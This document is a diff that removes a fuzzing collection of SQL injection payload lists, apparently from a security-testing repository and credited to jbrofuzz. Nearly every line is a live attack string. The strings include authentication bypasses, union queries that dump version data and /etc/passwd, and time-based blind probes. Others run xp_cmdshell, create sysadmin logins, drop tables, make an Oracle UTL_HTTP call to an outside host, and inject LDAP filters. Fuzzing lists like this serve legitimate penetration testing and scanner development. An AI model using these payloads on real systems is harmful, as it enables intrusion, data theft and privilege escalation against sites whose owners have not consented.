sqli

attack-payloads/sql-injection/detect-generic/sql-injection-active.txt

@@ -1,11 +0,0 @@
-# contains statements from jbrofuzz (13 April 2010)
-'; exec master..xp_cmdshell 'ping 10.10.1.2'--
-create user name identified by 'pass123'
-create user name identified by pass123 temporary tablespace temp default tablespace users; 
-' ; drop table temp --
-exec sp_addlogin 'name' , 'password'
-exec sp_addsrvrolemember 'name' , 'sysadmin'
-insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123'))
-grant connect to name; grant resource to name;
-insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
-

attack-payloads/sql-injection/detect-generic/sql-injection-passive.txt

@@ -1,57 +0,0 @@
-# Contains statements from jbrofuzz (13 April 2010)
-'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
-||6
-'||'6
-(||6)
-' or 1=1-- 
-or 1=1
-' or '1'='1
-; or '1'='1'
-" or isNULL(1/0) /*
-' or '7659'='7659
-" or isNULL(1/0) /*
-' -- 
-' or 1=1--
-" or 1=1--
-' or 1=1 /*
-or 1=1--
-' or 'a'='a
-" or "a"="a
-') or ('a'='a
-admin' or '
-' select * from information_schema.tables--
-) union select * from information_schema.tables;
-' having 1=1--
-' having 1=1--
-' group by userid having 1=1--
-' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
-' or 1 in (select @@version)--
-' union all select @@version--
-' or 'unusual' = 'unusual'
-' or 'something' = 'some'+'thing'
-' or 'text' = n'text'
-' or 'something' like 'some%'
-' or 2 > 1
-' or 'text' > 't'
-' or 'whatever' in ('whatever')
-' or 2 between 1 and 3
-' or username like char(37);
-' union select * from users where login = char(114,111,111,116);
-' union select 
-password:*/=1--
-uni/**/on sel/**/ect
-'; execute immediate 'sel' || 'ect us' || 'er'
-'; exec ('sel' + 'ect us' + 'er')
-'/**/or/**/1/**/=/**/1
-' or 1/*
- or isNULL(1/0) /*
-' or '7659'='7659
-" or isNULL(1/0) /*
-' -- &password=
-'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > 
-@var select @var as var into temp end --
-' and 1 in (select var from temp)--
-' union select 1,load_file('/etc/passwd'),1,1,1;
-1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
-' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
-

attack-payloads/sql-injection/detect-generic/sql-injection.txt

@@ -1,144 +0,0 @@
-# to attempt with ids/waf evasion try like
-# /index.aspx?page=select 1&page=2,3 from table where id=1
-'sqlvuln
-'+sqlvuln
-sqlvuln;
-(sqlvuln)
-a' or 1=1--
-"a"" or 1=1--"
- or a = a
-a' or 'a' = 'a
-1 or 1=1
-a' waitfor delay '0:0:10'--
-1 waitfor delay '0:0:10'--
-declare @q nvarchar (4000) select @q =
-0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
-0
-031003000270000
-declare @s varchar(22) select @s =
-0x77616974666F722064656C61792027303A303A31302700 exec(@s)
-0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
-declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
-exec(@s)
-a'
-?
-' or 1=1
-‘ or 1=1 --
-x' AND userid IS NULL; --
-x' AND email IS NULL; --
-anything' OR 'x'='x
-x' AND 1=(SELECT COUNT(*) FROM tabname); --
-x' AND members.email IS NULL; --
-x' OR full_name LIKE '%Bob%
-23 OR 1=1
-'; exec master..xp_cmdshell 'ping 172.10.1.255'--
-'
-'%20or%20''='
-'%20or%20'x'='x
-%20or%20x=x
-')%20or%20('x'='x
-0 or 1=1
-' or 0=0 --
-" or 0=0 --
-or 0=0 --
-' or 0=0 #
- or 0=0 #"
-or 0=0 #
-' or 1=1--
-" or 1=1--
-' or '1'='1'--
-' or 1 --'
-or 1=1--
-or%201=1
-or%201=1 --
-' or 1=1 or ''='
- or 1=1 or ""=
-' or a=a--
- or a=a
-') or ('a'='a
-) or (a=a
-hi or a=a
-hi or 1=1 --"
-hi' or 1=1 --
-hi' or 'a'='a
-hi') or ('a'='a
-"hi"") or (""a""=""a"
-'hi' or 'x'='x';
-@variable
-,@variable
-PRINT
-PRINT @@variable
-select
-insert
-as
-or
-procedure
-limit
-order by
-asc
-desc
-delete
-update
-distinct
-having
-truncate
-replace
-like
-handler
-bfilename
-' or username like '%
-' or uname like '%
-' or userid like '%
-' or uid like '%
-' or user like '%
-exec xp
-exec sp
-'; exec master..xp_cmdshell
-'; exec xp_regread
-t'exec master..xp_cmdshell 'nslookup www.google.com'--
---sp_password
-\x27UNION SELECT
-' UNION SELECT
-' UNION ALL SELECT
-' or (EXISTS)
-' (select top 1
-'||UTL_HTTP.REQUEST
-1;SELECT%20*
-to_timestamp_tz
-tz_offset
-<>"'%;)(&+
-'%20or%201=1
-%27%20or%201=1
-%20$(sleep%2050)
-%20'sleep%2050'
-char%4039%41%2b%40SELECT
-&apos;%20OR
-'sqlattempt1
-(sqlattempt2)
-|
-%7C
-*|
-%2A%7C
-*(|(mail=*))
-%2A%28%7C%28mail%3D%2A%29%29
-*(|(objectclass=*))
-%2A%28%7C%28objectclass%3D%2A%29%29
-(
-%28
-)
-%29
-&
-%26
-!
-%21
-' or 1=1 or ''='
-' or ''='
-x' or 1=1 or 'x'='y
-/
-//
-//*
-*/*
-a' or 3=3--
-"a"" or 3=3--"
-' or 3=3
-‘ or 3=3 --

attack-payloads/sql-injection/detect-ms-sql/sql-injection-ms-sql-blind-ninja.txt

@@ -1,9 +0,0 @@
-# contains statements from jbrofuzz (13 April 2010)
-'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
-'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
-'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
-'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
-'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
-'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 
-'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
-'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

attack-payloads/sql-injection/detect-ms-sql/sql-injection-ms-sql.txt

@@ -1,7 +0,0 @@
-' or 1=1 --
-' union (select @@version) --
-' union (select NULL, (select @@version)) --
-' union (select NULL, NULL, (select @@version)) --
-' union (select NULL, NULL, NULL,  (select @@version)) --
-' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
-' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --

attack-payloads/sql-injection/detect-mysql/sql-injection-mysql-ms-sql.txt

@@ -1,11 +0,0 @@
-# Contains statements from jbrofuzz (13 April 2010)
-1
-1 and user_name() = 'dbo'
-\'; desc users; --
-1\'1
-1' and non_existant_table = '1
-' or username is not NULL or username = '
-1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
-1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
-1 uni/**/on select all from where
-

attack-payloads/sql-injection/detect-mysql/sql-injection-mysql.txt

@@ -1,7 +0,0 @@
-# Contains statements from jbrofuzz (13 April 2010)
-1
-1'1
-1 exec sp_ (or exec xp_)
-1 and 1=1
-1' and 1=(select count(*) from tablenames); --
-

attack-payloads/sql-injection/detect-oracle/sql-injection-oracle.txt

@@ -1,4 +0,0 @@
-# contains statements from jbrofuzz
-'||utl_http.request('httP://192.168.1.1/')||'
-' || myappadmin.adduser('admin', 'newpass') || '
-